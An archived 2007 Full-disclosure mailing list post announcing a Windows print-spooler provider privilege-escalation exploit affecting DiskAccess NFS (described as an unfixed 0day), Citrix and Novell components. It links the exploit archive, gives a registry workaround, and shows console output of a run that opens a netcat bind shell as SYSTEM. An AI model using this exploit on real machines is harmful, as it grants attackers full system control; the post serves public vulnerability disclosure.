[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] Universal printer provider exploit for Windows
From: "Andres Tarasco" <atarasco () gmail ! com>
Date: 2007-01-29 10:42:35
Message-ID: 80321d330701290242h56879d87jc346fc5fd3a9386c () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
We have developed a new exploit that should allow code execution as SYSTEM
with the following software:
- DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED
-0day!!!
- Citrix Metaframe - cpprov.dll - FIXED
- Novell (nwspool.dll - CVE-2006-5854 - untested. pls give feedback)
More information at :
http://www.514.es/2007/01/universal_exploit_for_vulnerab.html (spanish)
exploit code:
http://www.514.es/2007/01/29/Universal_printer_provider_exploit.zip
/*
Title: Universal exploit for vulnerable printer providers (spooler service).
Vulnerability: Insecure EnumPrintersW() calls
Author: Andres Tarasco Acuña - atarasco@514.es
Website: http://www.514.es
This code should allow to gain SYSTEM privileges with the following
software:
blink !blink! blink!
- DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED
-0day!!!
- Citrix Metaframe - cpprov.dll - FIXED
- Novell (nwspool.dll - CVE-2006-5854 - untested)
- More undisclosed stuff =)
If this code crashes your spooler service (spoolsv.exe) check your
"vulnerable" printer providers at:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers
Workaround: Trust only default printer providers "Internet Print Provider"
and "LanMan Print Services" and delete the other ones.
And remember, if it doesnt work for you, tweak it yourself. Do not ask
D:\Programación\EnumPrinters\Exploits>testlpc.exe
[+] Citrix Presentation Server - EnumPrinterW() Universal exploit
[+] Exploit coded by Andres Tarasco - atarasco@514.es
[+] Connecting to spooler LCP port \RPC Control\spoolss
[+] Trying to locate valid address (1 tries)
[+] Mapped memory. Client address: 0x003d0000
[+] Mapped memory. Server address: 0x00a70000
[+] Targeting return address to : 0x00A700A7
[+] Writting to shared memory...
[+] Written 0x1000 bytes
[+] Exploiting vulnerability....
[+] Exploit complete. Now Connect to 127.0.0.1:51477
D:\Programación\EnumPrinters>nc localhost 51477
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM
regards,
Andres Tarasco
[Attachment #5 (text/html)]
<p>We have developed a new exploit that should allow code execution as SYSTEM with the \
following software:</p>
<p> - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED -0day!!! <br>
- Citrix Metaframe - cpprov.dll - FIXED<br>
- Novell (nwspool.dll - CVE-2006-5854 - untested. pls give feedback)<br></p>More information \
at : <a href="http://www.514.es/2007/01/universal_exploit_for_vulnerab.html">http://www.514.es/2007/01/universal_exploit_for_vulnerab.html
</a> (spanish)<br>exploit code: <a \
href="http://www.514.es/2007/01/29/Universal_printer_provider_exploit.zip">http://www.514.es/2007/01/29/Universal_printer_provider_exploit.zip</a><br><br>/*<br> \
Title: Universal exploit for vulnerable printer providers (spooler service). \
<br> Vulnerability: Insecure EnumPrintersW() calls<br> Author: Andres Tarasco Acuña - \
<a href="mailto:atarasco@514.es">atarasco@514.es</a><br> Website: <a \
href="http://www.514.es">http://www.514.es</a><br> <br><br> This code should allow to \
gain SYSTEM privileges with the following software: <br> blink !blink! \
blink!<br><br> - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED \
-0day!!! <br> - Citrix Metaframe - cpprov.dll - FIXED<br> - Novell \
(nwspool.dll - CVE-2006-5854 - untested)<br> - More undisclosed stuff \
=)<br><br> If this code crashes your spooler service (spoolsv.exe) check your <br> \
"vulnerable" printer providers at:<br> \
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers <br><br> Workaround: \
Trust only default printer providers "Internet Print Provider" <br> and \
"LanMan Print Services" and delete the other ones.<br> <br> And remember, \
if it doesnt work for you, tweak it yourself. Do not ask <br><br><br> \
D:\Programación\EnumPrinters\Exploits>testlpc.exe<br> [+] Citrix Presentation Server - \
EnumPrinterW() Universal exploit<br> [+] Exploit coded by Andres Tarasco - <a \
href="mailto:atarasco@514.es">atarasco@514.es </a><br> <br><br> [+] Connecting to \
spooler LCP port \RPC Control\spoolss<br> [+] Trying to locate valid address (1 \
tries)<br> [+] Mapped memory. Client address: 0x003d0000<br> [+] Mapped memory. \
Server address: 0x00a70000 <br> [+] Targeting return address to : \
0x00A700A7<br> [+] Writting to shared memory...<br> [+] Written 0x1000 \
bytes<br> [+] Exploiting vulnerability....<br> [+] Exploit complete. Now Connect to \
<a href="http://127.0.0.1:51477"> \
127.0.0.1:51477</a><br> <br><br> D:\Programación\EnumPrinters>nc localhost \
51477<br> Microsoft Windows XP [Versión 5.1.2600]<br> (C) Copyright 1985-2001 \
Microsoft Corp.<br><br> C:\WINDOWS\system32>whoami<br> NT AUTHORITY\SYSTEM \
<br><br>regards,<br><br>Andres Tarasco<br>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic